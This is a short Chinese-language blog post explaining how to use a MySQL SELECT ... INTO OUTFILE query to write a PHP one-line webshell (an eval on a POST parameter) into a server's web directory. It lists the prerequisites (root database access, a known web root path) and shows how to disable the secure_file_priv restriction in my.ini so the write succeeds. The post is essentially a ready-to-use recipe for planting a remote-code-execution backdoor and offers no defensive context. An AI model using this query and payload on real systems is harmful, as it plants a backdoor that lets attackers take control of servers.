通过mysql写入php一句话木马

Posted 2021-02-10 逆水行舟，不进则退

 利用mysql写入一句话木马

前提：

　　root权限，知道了服务器的web的绝对路径

select "<?php @eval($_POST[\'pass\']);?>" INTO OUTFILE "D:\\\\WWW\\\\22.php"

如果执行成功，生成D:\\WWW\\22.php，并写入

<?php @eval($_POST[\'pass\']);?>

如果出现：

　　提示错误[Error Code] 1290 - The MySQL server is running with the --secure-file-priv option解决办法

是mysql设置的权限的问题

mysql对通过文件导入导出作了限制，默认不允许

show variables like \'%secure%\';

修改my.ini

secure_auth = ON
secure_file_priv = ""

注意：　

　　1、绝对路径的猜解

　　2、INTO OUTFILE 后面的"D:\\\\WWW\\\\22.php"(对反斜杠做了一次转义)